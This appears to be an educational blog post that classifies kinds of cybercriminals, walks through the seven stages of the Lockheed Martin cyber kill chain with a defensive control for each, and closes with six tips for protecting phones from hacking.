Cybercrime is a criminal activity that either targets or uses a computer, a computer network, or a networked device. According to the Norwich University, cybercrimes have quickly become one of the fastest rising forms of modern crime as approximately 1 million potential cyberattacks are attempted per day. With the evolution of technology daily, this number is likely to increase. Trend Micro stated that laws related to cybercrime continue to evolve across various countries worldwide, with law enforcement agencies continually challenged when finding, arresting, charging, and proving cybercrimes. This post will discuss five different classifications of these cybercriminals.

1. Script Kiddies - Someone who lacks programming knowledge and uses existing software to launch an attack. This classification of cybercriminals typically uses current and frequently well-known and easy to find techniques and programs or scripts to search for and exploit vulnerabilities in other computers on the Internet often randomly and with little regard or perhaps even understanding of the potentially harmful consequences.

2. Insiders - Someone with authorized access to company assets who use that access, whether maliciously or unintentionally, harms the business. An insider threat, typically involves a current or former employee or business associate. There are usually three types of insider threats: malicious insider better known as a turn cloak, careless insider – an innocent employee who unknowingly expose an organization to external risks; and a mole – technically an outsider who gained insider access to a privileged network.

3. Advanced Persistent Threats (APT) - An unauthorized actor who gains access to a network or system and remains there for an extended period without being discovered. The motives of advanced persistent threat actors are varied. For example, attackers sponsored by nation-states may target intellectual property to gain a competitive advantage in specific industries. In contrast, others may be sponsored by organized crime groups to obtain the information they can use to carry out criminal acts.

4. Hacktivists – Groups of criminals who unite to carry out cyber-attacks to support political causes. According to Check Point, however, hacktivist groups' motivations vary and may include more than political reasons. Revenge, social incentives, ideology, protest, a desire to embarrass specific organizations or individuals within those organizations, or sometimes sheer vandalism are examples of other motivators hacktivist groups may have.

5. Lone Wolf (Black Hat Hacker) – A hacker who breaks into a computer system or network with malicious intent, usually for monetary gain. Lone wolf attackers are difficult to track, and cyber lone wolf actors are equally difficult to find because they operate individually and on the Dark Web, known for its anonymity. As a result, lone wolf threat actors are a powerful force in the cybercrime underground.

The cyber kill chain is a way to understand the sequence of events involved in cyberattacks from the early reconnaissance stages to data exfiltration. The kill chain helps cybersecurity professionals understand and combat malware such as ransomware, security breaches, and advanced persistent threats (APTs). The Lockheed Martin version of the cyber kill chain consists of seven (7) steps:

1.     Reconnaissance. In the reconnaissance stage, attackers assess the target from outside the organization from both a technical and non-technical perspective. In this stage, the attacker, through active or passive means, works on determining which targets will return the most benefit for the resources expended in exploiting the target's information systems. The attacker will be looking for information systems with few protections or exploitable vulnerabilities. For example, through active information gathering, an attacker could identify the version of a mail server.

With this information, the attacker can research known vulnerabilities or discover new unpublish vulnerabilities that can be leveraged to access the system. Organizations should have measures to prevent the disclosure of sensitive information such as version numbers to the public. Security awareness training is also necessary to sensitize staff on social engineering tactics attackers would employ as well as how to dispose of sensitive information appropriately.

2.     Weaponization. During weaponization, the threat actor develops malware crafted explicitly to the vulnerabilities discovered during the reconnaissance phase of the cyber kill chain. Based on the intelligence gathered in the reconnaissance phase, the attacker will tailor their toolset to meet the target network's specific requirements. For example, let us say the attacker found that the mail server version identified in the reconnaissance phase had an open relay vulnerability. Such a vulnerability would allow the attacker to send potentially malicious emails on behalf of internal staff. The best measure to have in place to mitigate against this phase is patch management. Ensuring that all your systems are up to date can make it difficult for attackers to weaponize findings from stage one. Again, security awareness training is critical for the human element of things.

3.     Delivery. This stage of the cyber kill chain, involves transmitting the malicious payload from the attacker to the target information system for exploitation. Research as shown that a network attack is most likely to originate from a spear-phishing attack targeting an internal employee of the organization. For example, leveraging the open relay vulnerability, the attacker sends a crafted email carrying a link or document that would download the attacker's malware. The delivery path or vector is via email. Security awareness training is critical at this stage so that employees know to be aware of attachments or links within emails, even if it is coming from a trusted source.

4.     Exploitation. During the cyber kill chain's exploitation phase, the attacker's malicious payload is executed on the target network through remote or local mechanisms. After executing, the malware can take advantage of discovered vulnerabilities to gain administrative access to the targeted organizational information system. For example, let's say an employee received the phishing email sent by the attacker via the open relay vulnerability and opened the document within the email because the CEO of the company addressed it. Upon opening the document (stager), malicious code is executed in the background, giving the attacker remote access to the target network. At this phase, organizations can employ several controls to mitigate or even prevent such an event. The use of network and host intrusion detection and prevention systems are one such mechanism that can be used as security controls at this phase.

5.     Installation. After successfully exploiting the targeted system, the malware moves to install itself onto the targeted information system. At this point, the malware begins to download additional payloads if network access is available. This approach allows the delivery payload size to remain small and undetectable. The small size of the malware in this example would have limited functionality. Therefore, the malware will download additional components to have better control of the exploited information systems and to penetrate further into the target organization's network. A security control that could be implemented at this phase is a zero-trust approach.

Zero trust is a security concept centered on the belief that organizations should not automatically trust anything inside or outside its perimeters. Instead, they must verify anything and everything trying to connect to its systems before granting access. Such an approach would mitigate against the installation of unverified software that could potentially be malicious.

6.     Command and Control. Command and control, or C2 for short, is when the attacker has placed a management and communication mechanism within the payload that infected the target network. This mechanism allows the attacker to manage the malware in the environment remotely. It will enable the attacker to move deeper into the network, exfiltrate data, and deny service operations or conduct destruction. For example, the malware that infected the network is continuously listening on port 31337 for instructions on what action to carry out on the target machine. To mitigate against this, administrators should have adequately configured network access control lists so that malware cannot use ports that are not within a whitelisted range of ports.

7. Actions on Objectives. The activities and objectives of the malware are dependent on its specific mission. For example, the malware could be focused on data exfiltration, denial of service, or destruction. The deployment of honeypots across the network is a reasonable security control to implement to identify the actions and objectives of an attacker, and the malware delivered. A honeypot is a network-attached system set up as a decoy to lure attackers and to detect, deflect, or study hacking attempts to gain unauthorized access to information systems. The function of a honeypot is to represent itself on the internet as a potential target for attackers, usually a server or other high-value target and to gather information and notify defenders of any attempts to access the honeypot by unauthorized users.

It is good to note that no one security measure is 100% effective against cyber-attacks. Similarly to how attackers may employ the cyber kill chain, organizations should employ a Defense in Depth approach in protecting their assets. Defense in Depth is an approach to cybersecurity in which a series of defensive mechanisms are layered to protect valuable data and information. This multi-layered approach with intentional redundancies increases the security of a system and addresses many different attack vectors.

According to McAfee, the threat of having your phone hacked has become a common and rational fear. The cold hard truth is that it is now possible to hack any phone. With the advancement of technology, where the discovery of knowledge and information advances the understanding of technology, hackers can hack even some of the most sophisticated phone software. There are many ways a hacker can get into your phone and steal personal and critical information. Here are a few tips to ensure that you are not a victim of phone hacking:

1. Keep up to date. Updating can be a tiresome and intrusive process. It even sometimes brings annoying changes to the interface you’re not familiar with. However, installing software updates as soon as they become available is very important. This action is vital because many successful hacks typically exploit vulnerabilities that have already been patched via updates.
   
   Additionally, avoid using unofficial tools to “root” your phone (known as “jailbreaking” on iOS). On a rooted/jailbroken phone, technical safeguards can be defeated, allowing apps to perform actions that are usually prohibited, such as accessing your personal data.
   
2. Never leave your phone unattended. Keeping your phone with you always while in a public place is the first, best rule to follow. The easiest way for a hacker to steal your phone's information is to gain access to it — therefore, it is always essential to keep your phone in your possession. If you have been away from your phone around a group of strangers and are concerned about possible hacking, check your settings, and look for strange apps.
   
3. Turn off WIFI and Bluetooth when not in use. It is easy for hackers to connect to your phone using WIFI or Bluetooth, so turn them off when not needed because there is no warning when a hacker attacks you. If you fear being hacked in a public space, turning off your phone can block hackers' ability to hack you. This is an effective preventative method. Users avoid using unprotected Bluetooth and WiFi networks.
   
4. Encrypt Your Device. Encrypting your cell phone can save you from being hacked and can protect your calls, messages, and critical information. To check if a device is encrypted: iPhone users can go into Touch ID & Passcode, scroll to the bottom, and enable Data protection. Android users have automatic encryption depending on the type of phone.
   
5. Pay attention to App Permissions. Read app permissions and avoid downloading apps that request more access than they should need to operate. Even if an app's permissions seem to line up with its function, check reviews online. For Android, download an antivirus app such as McAfee or Bitdefender that will scan apps before download and flag suspicious activity on apps you do have.
   
6. Avoid public charging stations. Do not plug into unknown devices; bring a wall charger. You might want to invest in a charge-only USB cable like PortaPow. If a public computer is your only option to revive a dead battery,  select the "Charge only" option (Android phones) if you get a pop-up when you plug in, or deny access from the other computer (iPhone).